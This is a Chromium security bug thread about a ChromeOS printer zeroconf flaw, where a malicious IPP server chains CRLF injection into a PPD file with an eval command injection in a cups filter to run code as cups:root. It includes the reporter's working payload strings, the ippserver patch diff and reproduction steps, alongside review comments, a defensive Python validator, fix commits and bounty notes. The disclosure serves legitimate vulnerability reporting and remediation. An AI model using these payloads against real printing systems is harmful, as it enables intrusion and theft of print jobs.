Security: ChromeOS printer zeroconf remote code execution
Reported by r...@rorym.cnamara.com, Oct 22 2017
Issue description
Google Chrome 61.0.3163.123 (Official Build) (64-bit)
Platform 9765.85.0 (Official Build) stable-channel swanky
Firmware Version Google_Swanky.5216.238.5
Two different bugs (CRLF injection and eval-based code injection) can be used by a malicious IPP server to cause ChromeOS to install a malicious PPD file which, on printing, will cause the payload to be executed with the same privileges as the cups daemon (cups:root inside a seccomp jail [1]).
To enable exploitation, the test ippserver from the cups distribution [2] can be modified and used.
The IPP server can specify formats to be accepted by the printer, which can be used to specify a specific filter executable to be executed when a print job is sent. Since the passed value is interpolated into the cupsFilter2 line, it is necessary to inject newlines and PPD comment characters to completely control the configuration item.
cupsFilter2 lines should normally look similar to:
*cupsFilter2: "application/vnd.cups-pdf application/pdf 10 -"
but the IPP server can control the second parameter, so we can inject a payload as below:
*cupsFilter2: "application/pdf application/vnd.cups-postscript 0 pstopxl"
*%;echo ********EXPLOIT START********|logger;env|logger;echo **** ****|logger|cat ${PPD}|logger;echo ********EXPLOIT END********|logger;exit
*% application/pdf application/vnd.cups-postscript 0 pstopxl"
*%;echo ********EXPLOIT START********|logger;env|logger;echo **** ****|logger|cat ${PPD}|logger;echo ********EXPLOIT END********|logger;exit
*% 10 -"
The payload is injected twice, but we can use \n*% to cause subsequent lines to be turned into comments. The format of our payload will become clear with the second exploit.
The configuration for this bug is specified in the 'formats' variable in the malicious IPP server [3], which we can change to the following to achieve the above payload:
- *formats = "application/pdf,image/jpeg,image/pwg-raster";
+ *formats = "application/pdf,application/pdf application/vnd.cups-postscript 0 pstopxl\"\n*%;echo ********EXPLOIT START********|logger;env|logger;echo **** ****|logger|cat ${PPD}|logger;echo ********EXPLOIT END********|logger;exit\n*%";
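Review bot: the `+` line only works because the CUPS-side PPD generator splices each document-format-supported value verbatim into the quoted *cupsFilter2 string; a generator that matches each format exactly against an allowlist of PDLs (PDF, JPEG, PNG and PWG-Raster, as in the upstream commits linked later in this thread) and rejects any value containing CR, LF, `"` or `*` never emits the injected second line at all, so the pstopxl filter cannot be selected by the printer.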
Along with our payload, we also specify the 'pstopxl' filter executable, which is present on ChromeOS. This executable contains an eval-based command injection vulnerability. eval is used in multiple locations throughout the cups filter distributions, but the specific one we exploit in this case is the DefaultInputSlot injection point [4]. This parameter can also be controlled by the malicious IPP server to cause the injection. In this case we modify the 'media_source_supported' array by changing the default value of 'auto' to one that will break out of the eval location and execute our code.
- "auto",
+ "x}\"$(sh${IFS}${PPD})\"x",
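Review bot: the value depends on gstopxl passing a PPD-derived string through `eval` inside a `${...}` expansion, so closing the brace and quote is enough for the `$(...)` to run; the durable fix is removing the eval rather than escaping this one value (the cups-filters 1.17.8 update noted later in the thread rewrote these bash filters), and until that lands any media-source keyword should be constrained to the IPP keyword character set (lowercase letters, digits, `-`, `.`, `_`) before it can reach a shell.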
Since the payload length is limited, we use the PPD file itself as a shell-based payload. As can be seen in the above cupsFilter2 payload, we use ; to add multiple commands on the same line, and an 'exit' so the payload is not executed twice. The value of ${PPD} is set by the parent of the filter, so we do not need to worry about locating our payload file. In my tests, none of the lines in the PPD file are valid shell commands, so there are no side effects other than errors being output for invalid commands.
With these two exploits the malicious IPP server can gain command execution on ChromeOS as cups:root, inside the seccomp jail [1]. I was unable to escape from the seccomp jail and limited user, but the seccomp policy is open enough for most malicious activities. From the restricted position, the payload should be able to read most current and future print jobs (after a reboot it would be necessary for the malicious printer to be re-used as there is no persistence).
To reproduce this vulnerability, patch ippserver from the cups distribution using the attached patch (commit 0bc1a539f used for testing, but any should work). Compile and run similarly to the following:
sudo ./ippserver -v exploit -p 631
Add a new printer:
- chrome://md-settings/cupsPrinters
- or print a page, change Destination, Local Destinations -> Manage (will redirect to chrome://settings/cupsPrinters)
Add printer, Add nearby printer.
Once the printer has been added using zeroconf, print to it and observe the payload output in file:///var/log/messages (^F for EXPLOIT). Interestingly, printers added using this method persist across a powerwash (noticed when transitioning into dev mode).
The exploit printer could masquerade as a legitimate printer, and proxy all jobs to the real printer for invisible exploitation.
Judging by the network traffic generated by the print preview window, I would imagine that one day local printers would automatically appear, increasing the likelihood of this exploit, but I was unable to get this to work, hence having to navigate to the settings and add the printer with more button clicks.
A LAN presence is required to exploit this vulnerability.
I have also attached the PPD file created on the device (obtained via developer mode) to show the injection locations.
[1] https://chromium.googlesource.com/chromiumos/overlays/chromiumos-overlay/+/master/net-print/cups/files/cupsd-seccomp-amd64.policy
[2] https://github.com/apple/cups/blob/master/test/ippserver.c
[3] https://github.com/apple/cups/blob/master/test/ippserver.c#L485
[4] https://github.com/richud/gstoraster/blob/master/cups/gstopxl#L110
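A defender's-side check for the two injection points described above, added here as an example and not code from CUPS, cups-filters or the reporter's patch: it generates the auto-configured printer's PPD only from an allowlist of PDLs (the same four the backported fix in this thread accepts) and refuses media-source keywords that fall outside IPP keyword syntax, so neither a crafted document-format value nor a crafted media-source value reaches the PPD verbatim. The PDL_FILTERS lines, the PPD layout and the INJECTED_FORMATS sample are assumptions constructed for the example.

```python
import re

# Allowlist modelled on the backported fix (PDF, JPEG, PNG, PWG-Raster). The
# cupsFilter2 lines themselves are assumed for this example, not copied from CUPS.
PDL_FILTERS = {
    "application/pdf":  '*cupsFilter2: "application/vnd.cups-pdf application/pdf 10 -"',
    "image/jpeg":       '*cupsFilter2: "image/jpeg image/jpeg 0 -"',
    "image/png":        '*cupsFilter2: "image/png image/png 0 -"',
    "image/pwg-raster": '*cupsFilter2: "image/pwg-raster image/pwg-raster 100 -"',
}

# IPP keyword syntax: lowercase letters, digits, '-', '.', '_'. Nothing a PPD
# parser or a shell treats specially (no quotes, braces, '$', '*', CR or LF).
KEYWORD_RE = re.compile(r"^[a-z0-9][a-z0-9._-]{0,62}$")

# Constructed input in the style of the report: a real media type followed by a
# quote, a newline and a PPD comment marker. It must never appear in the output.
INJECTED_FORMATS = 'application/pdf,application/pdf application/vnd.cups-postscript 0 pstopxl"\n*% injected'


class UntrustedAttributeError(ValueError):
    """Raised when a printer-supplied attribute cannot be used safely."""


def filter_lines(formats: str) -> list:
    """cupsFilter2 lines for document-format-supported, matched exactly against the allowlist.

    A value with extra fields appended is simply not a key, so it is dropped, never interpolated.
    """
    return [PDL_FILTERS[f.strip()] for f in formats.split(",") if f.strip() in PDL_FILTERS]


def input_slot_lines(media_sources: list) -> list:
    """InputSlot entries for media-source-supported; any non-keyword value aborts setup."""
    bad = [s for s in media_sources if not KEYWORD_RE.match(s)]
    if bad or not media_sources:
        raise UntrustedAttributeError(f"media-source-supported rejected: {bad!r}")
    lines = [f"*DefaultInputSlot: {media_sources[0]}"]
    lines += [f'*InputSlot {s}/{s}: ""' for s in media_sources]
    return lines


def build_ppd(formats: str, media_sources: list) -> str:
    """Assemble the PPD. Every emitted line is written by this module, none by the printer."""
    lines = ['*PPD-Adobe: "4.3"'] + filter_lines(formats) + input_slot_lines(media_sources)
    assert all("\n" not in line and "\r" not in line for line in lines)  # defence in depth
    return "\n".join(lines) + "\n"


def rejects_media_source(value: str) -> bool:
    """True if the generator refuses this media-source keyword."""
    try:
        input_slot_lines([value])
        return False
    except UntrustedAttributeError:
        return True
```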
Oct 25 2017
Sandboxed RCE is... not great. Andrew, this needs to be handled by the CUPS CrOS printing team ASAP as a high-severity bug.
Oct 25 2017
Also, do we even need zeroconf?
Oct 25 2017
Zeroconf is a critical feature for the product. Assigning to Sean to look at as Justin (who worked a lot on this) is ooo a lot of this week, including now.
Oct 25 2017
We usually mark high-severity bugs as P1 (sandboxed code exec is high-severity per our ratings at http://www.chromium.org/developers/severity-guidelines), but we do expect it to be fixed in the current milestone and backported to stable. Thanks!
Oct 26 2017
I'm looking into this. We can likely disable downloading arbitrary PPDs from untrusted servers.
Oct 26 2017
There are two patches from upstream that restrict what filters we accept which will prevent the pstopxl filter being configured for zeroconf printers. https://github.com/apple/cups/commit/07428f6a640ff93aa0b4cc69ca372e2cf8490e41 https://github.com/apple/cups/commit/1add23375658e9163e5493ee19de7c9f7a9b483b
Oct 26 2017
Thanks Sean! Can we also do something about the CRLF injection, maybe patch that locally? Or, can we remove and/or fix the eval in the pstopxl filter?
Oct 26 2017
Quick note: pstopxl was not the only filter that appeared to contain exploitable evals. I can't check on my device right now, but grepping in /usr/libexec/cups/filter/ should find more.
Oct 27 2017
Hey Sean, were you able to at least start landing those patches? We can look at the other filters next, but we should start by making sure pstopxl is not reachable. Thanks!
Oct 27 2017
I just sent a CL so we don't configure pstopxl as a filter for an automatically configured printer. I'm going to look into the filters before the CRLF injection. We're going to stop allowing insertion of arbitrary values for filters but there are other fields where we should disallow CRLF.
Oct 29 2017
It looks like gstopxl is from cups-filters, not ghostscript. I'm investigating if it can be removed.
Oct 30 2017
The following revision refers to this bug:
https://chromium.googlesource.com/chromiumos/overlays/chromiumos-overlay/+/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448

commit 2ef707a9b50f577b2d4b5fdfcea99736a5ac9448
Author: Sean Kau <skau@chromium.org>
Date: Mon Oct 30 23:21:07 2017

net-print/cups: Backport patches to restrict IPP Everywhere filters.

Restrict filters we accept for IPP Everywhere configurations to exactly PDF, JPEG, PNG, PWG-Raster. URF was added in the original patch but has been explicitly excluded since we lack the appropriate filter changes.

BUG= chromium:777215
TEST=Verify zeroconf setup still works.

Change-Id: Ief1ab83cfc0f1cb5c7c71740ddf5a1aeed066bcb
Reviewed-on: https://chromium-review.googlesource.com/742381
Commit-Ready: Sean Kau <skau@chromium.org>
Tested-by: Sean Kau <skau@chromium.org>
Reviewed-by: Jorge Lucangeli Obes <jorgelo@chromium.org>

[rename] https://crrev.com/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448/net-print/cups/cups-2.1.4-r28.ebuild
[add] https://crrev.com/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448/net-print/cups/files/cups-2.2.2-Only-list-supported-PDLs-Issue-4923.patch
[modify] https://crrev.com/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448/net-print/cups/cups-2.1.4.ebuild
[add] https://crrev.com/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448/net-print/cups/files/cups-2.2.2-Tweak-the-PDL-priority-Issue-4932.patch
Nov 3 2017
Updating cups-filters to the current version (1.17.8) removes the eval vulnerability.
Nov 3 2017
I'm going to mark this as fixed so I can get the cherry-pick approved.
Nov 3 2017
This bug requires manual review: M63 has already been promoted to the beta branch, so this requires manual review. Please contact the milestone owner if you have questions. Owners: cmasso@ (Android), cmasso@ (iOS), gkihumba@ (ChromeOS), govind@ (Desktop). For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Nov 6 2017
approving M-62 and M-63
Nov 6 2017
The following revision refers to this bug:
https://chromium.googlesource.com/chromiumos/overlays/chromiumos-overlay/+/3de55925d80fc923c793a0ffefdb0cbb177996d6

commit 3de55925d80fc923c793a0ffefdb0cbb177996d6
Author: Sean Kau <skau@chromium.org>
Date: Mon Nov 06 22:42:46 2017

net-print/cups: Backport patches to restrict IPP Everywhere filters.

Restrict filters we accept for IPP Everywhere configurations to exactly PDF, JPEG, PNG, PWG-Raster. URF was added in the original patch but has been explicitly excluded since we lack the appropriate filter changes.

BUG= chromium:777215
TEST=Verify zeroconf setup still works.

Change-Id: Ief1ab83cfc0f1cb5c7c71740ddf5a1aeed066bcb
Previous-Reviewed-on: https://chromium-review.googlesource.com/742381
(cherry picked from commit ea0ae7891ba8e2983634f406c9df7ce746962a90)
Reviewed-on: https://chromium-review.googlesource.com/747848
Reviewed-by: Jorge Lucangeli Obes <jorgelo@chromium.org>
Commit-Queue: Sean Kau <skau@chromium.org>
Tested-by: Sean Kau <skau@chromium.org>
Trybot-Ready: Sean Kau <skau@chromium.org>

[add] https://crrev.com/3de55925d80fc923c793a0ffefdb0cbb177996d6/net-print/cups/cups-2.1.4-r28.ebuild
[add] https://crrev.com/3de55925d80fc923c793a0ffefdb0cbb177996d6/net-print/cups/files/cups-2.2.2-Only-list-supported-PDLs-Issue-4923.patch
[modify] https://crrev.com/3de55925d80fc923c793a0ffefdb0cbb177996d6/net-print/cups/cups-2.1.4.ebuild
[add] https://crrev.com/3de55925d80fc923c793a0ffefdb0cbb177996d6/net-print/cups/files/cups-2.2.2-Tweak-the-PDL-priority-Issue-4932.patch
Nov 6 2017
The following revision refers to this bug:
https://chromium.googlesource.com/chromiumos/overlays/chromiumos-overlay/+/00e71e234336642d5ccbdc657286fd7d9086602d

commit 00e71e234336642d5ccbdc657286fd7d9086602d
Author: Sean Kau <skau@chromium.org>
Date: Mon Nov 06 22:42:51 2017

net-print/cups: Backport patches to restrict IPP Everywhere filters.

Restrict filters we accept for IPP Everywhere configurations to exactly PDF, JPEG, PNG, PWG-Raster. URF was added in the original patch but has been explicitly excluded since we lack the appropriate filter changes.

BUG= chromium:777215
TEST=Verify zeroconf setup still works.

Change-Id: Ief1ab83cfc0f1cb5c7c71740ddf5a1aeed066bcb
Previous-Reviewed-on: https://chromium-review.googlesource.com/742381
(cherry picked from commit 9e2af650268d45e9e51ae1da29ff6bbed934ecf5)
Reviewed-on: https://chromium-review.googlesource.com/747871
Reviewed-by: Jorge Lucangeli Obes <jorgelo@chromium.org>
Commit-Queue: Sean Kau <skau@chromium.org>
Tested-by: Sean Kau <skau@chromium.org>
Trybot-Ready: Sean Kau <skau@chromium.org>

[rename] https://crrev.com/00e71e234336642d5ccbdc657286fd7d9086602d/net-print/cups/cups-2.1.4-r28.ebuild
[add] https://crrev.com/00e71e234336642d5ccbdc657286fd7d9086602d/net-print/cups/files/cups-2.2.2-Only-list-supported-PDLs-Issue-4923.patch
[modify] https://crrev.com/00e71e234336642d5ccbdc657286fd7d9086602d/net-print/cups/cups-2.1.4.ebuild
[add] https://crrev.com/00e71e234336642d5ccbdc657286fd7d9086602d/net-print/cups/files/cups-2.2.2-Tweak-the-PDL-priority-Issue-4932.patch
Nov 7 2017
The following revision refers to this bug:
https://chromium.googlesource.com/chromiumos/overlays/portage-stable/+/8827c2d9757d829a474163eb7150e66e37064284

commit 8827c2d9757d829a474163eb7150e66e37064284
Author: Sean Kau <skau@chromium.org>
Date: Tue Nov 07 07:49:01 2017

net-print/cups-filters: Update to 1.17.8

Updating the cups-filters package to 1.17.8 from 1.8.2. Many of the filters were rewritten to remove a lot of the bash scripts. The previously included patches are in 1.17.8.

BUG= chromium:777215
TEST=Print a page using the foomatic-rip filter.

Change-Id: Icbde6517925dd88b3fdf6d170b500dabc144effc
Reviewed-on: https://chromium-review.googlesource.com/750045
Commit-Ready: Brian Norris <briannorris@chromium.org>
Tested-by: Sean Kau <skau@chromium.org>
Reviewed-by: Brian Norris <briannorris@chromium.org>
Reviewed-by: Mike Frysinger <vapier@chromium.org>

[modify] https://crrev.com/8827c2d9757d829a474163eb7150e66e37064284/net-print/cups-filters/Manifest
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-configure-PKG_CONFIG.patch
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.0.71-poppler0340.patch
[add] https://crrev.com/8827c2d9757d829a474163eb7150e66e37064284/net-print/cups-filters/files/cups-browsed.init.d-r1
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-browsed.service
[modify] https://crrev.com/8827c2d9757d829a474163eb7150e66e37064284/net-print/cups-filters/metadata.xml
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.0.65-poppler0310.patch
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-browsed.init.d
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/cups-filters-1.8.2-r5.ebuild
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-gstoraster-path-lookup.patch
[add] https://crrev.com/8827c2d9757d829a474163eb7150e66e37064284/net-print/cups-filters/cups-filters-1.17.8.ebuild
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-disable-ijs.patch
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.0.53-uclibc.patch
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-foomatic-rip-sig-pipe.patch
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-gstoraster.patch
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.1-allow-disable-ghostscript.patch
Nov 9 2017
Nice one! The VRP panel decided to award $2,000 for this report. Thanks!
Nov 10 2017
This issue has been approved for a merge. Please merge the fix to any appropriate branches as soon as possible! If all merges have been completed, please remove any remaining Merge-Approved labels from this issue. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Nov 16 2017
Just to close the loop on this, I believe the merges broke some filters which is why Sean did not backport the CUPS uprev.
Nov 16 2017
Yes. The filters are not being backported. However, the remote vulnerability is fixed by the cups patch which has been backported to 62.
Feb 9 2018
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot